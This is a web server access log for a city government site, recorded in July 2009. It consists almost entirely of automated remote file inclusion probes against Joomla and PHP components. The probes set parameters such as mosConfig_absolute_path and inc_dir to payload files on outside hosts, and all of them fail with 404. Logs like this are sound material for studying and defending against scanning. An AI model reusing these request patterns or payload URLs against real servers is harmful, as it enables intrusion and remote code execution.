60.43.229.5 - - [01/Jul/2009:05:53:07 -0700] "GET /logs/access_080330.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:54:14 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:55:03 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:55:07 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:55:07 -0700] "GET /logs/access_080531.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:55:07 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:56:50 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:57:02 -0700] "GET /logs/access_081001.log%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:05:58:05 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:05:58:05 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:05:58:09 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:59:27 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:59:28 -0700] "GET //vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:59:28 -0700] "GET /logs///vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:05:59:42 -0700] "GET /logs/access_080330.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:05:59:42 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:05:59:42 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:05:59:59 -0700] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:05:59:59 -0700] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:05:59:59 -0700] "GET /logs/access_081001.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:00:03 -0700] "GET /logs/access_080330.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:00:04 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:00:04 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:00:04 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:00:07 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:06:00:10 -0700] "GET /logs/access.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:06:01:16 -0700] "GET /logs/access.log%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:06:01:17 -0700] "GET /logs/access_081001.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:06:01:24 -0700] "GET /logs/access.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:01:28 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:01:28 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:01:28 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:01:30 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [01/Jul/2009:06:02:37 -0700] "GET /logs/access_081001.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [01/Jul/2009:06:02:37 -0700] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [01/Jul/2009:06:02:37 -0700] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:02:38 -0700] "GET /logs/access_081001.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:02:38 -0700] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:02:38 -0700] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:02:47 -0700] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:02:47 -0700] "GET /logs/access_081001.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:02:47 -0700] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [01/Jul/2009:06:02:51 -0700] "GET /logs/access_081001.log/errors.php?error=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [01/Jul/2009:06:02:51 -0700] "GET /logs/errors.php?error=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [01/Jul/2009:06:02:51 -0700] "GET /errors.php?error=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:02:52 -0700] "GET /logs/access.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [01/Jul/2009:06:02:53 -0700] "GET /logs/access.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:02:58 -0700] "GET /logs/access.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [01/Jul/2009:06:03:06 -0700] "GET /logs/access.log/errors.php?error=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:03:24 -0700] "GET /logs/access.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:03:25 -0700] "GET /logs/access_080330.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.18.198.72 - - [01/Jul/2009:06:03:29 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
84.18.198.72 - - [01/Jul/2009:06:03:29 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
84.18.198.72 - - [01/Jul/2009:06:03:29 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:03:33 -0700] "GET /logs/access_080330.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.18.198.72 - - [01/Jul/2009:06:03:36 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
84.18.198.72 - - [01/Jul/2009:06:03:36 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:03:36 -0700] "GET /logs/access_081001.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.18.198.72 - - [01/Jul/2009:06:03:36 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:03:49 -0700] "GET /logs/access.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:06:03:51 -0700] "GET /logs/access.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:04:13 -0700] "GET /logs/access_080330.log//modules/TotalCalendar/about.php?inc_dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.254.39.210 - - [01/Jul/2009:06:05:12 -0700] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
65.254.39.210 - - [01/Jul/2009:06:05:12 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
65.254.39.210 - - [01/Jul/2009:06:05:12 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:05:21 -0700] "GET /logs/access.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:05:23 -0700] "GET /logs/access_080330.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:05:34 -0700] "GET /logs/access.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:06:06:13 -0700] "GET /logs/access_080330.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:06:16 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:06:17 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:06:17 -0700] "GET /logs/access_080531.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [01/Jul/2009:06:06:26 -0700] "GET /logs/access_081001.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [01/Jul/2009:06:07:06 -0700] "GET /logs/access_080531.log/errors.php?error=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [01/Jul/2009:06:07:36 -0700] "GET /logs/access.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.96.54.74 - - [01/Jul/2009:06:09:39 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "cityofarkadelphia.com"
208.96.54.74 - - [01/Jul/2009:06:09:44 -0700] "GET /logs/access_080330.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:09:50 -0700] "GET /logs/access_080330.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.96.54.74 - - [01/Jul/2009:06:09:53 -0700] "GET /logs/access.log HTTP/1.1" 200 393015 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:10:26 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:10:26 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:10:26 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
91.192.20.164 - - [01/Jul/2009:06:11:01 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.192.20.164 - - [01/Jul/2009:06:11:01 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.192.20.164 - - [01/Jul/2009:06:11:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:06 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:06 -0700] "GET /logs/access_080330.log//modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:06 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:22 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:22 -0700] "GET /logs/access_080330.log//modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:23 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.193.225.191 - - [01/Jul/2009:06:13:23 -0700] "GET /logs/access_080601.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
62.193.225.191 - - [01/Jul/2009:06:13:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
62.193.225.191 - - [01/Jul/2009:06:13:24 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:25 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:25 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:25 -0700] "GET /logs/access_080330.log//modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:13:25 -0700] "GET /logs/access_081001.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:27 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:27 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:06:13:27 -0700] "GET /logs/access_080330.log//modules/TotalCalendar/about.php?inc_dir=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:13:32 -0700] "GET /logs/access.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:06:13:35 -0700] "GET /logs/access_080531.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:06:13:46 -0700] "GET /logs/access_080531.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:06:16:45 -0700] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:06:16:45 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:06:16:46 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:19:27 -0700] "GET /index.php?body=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
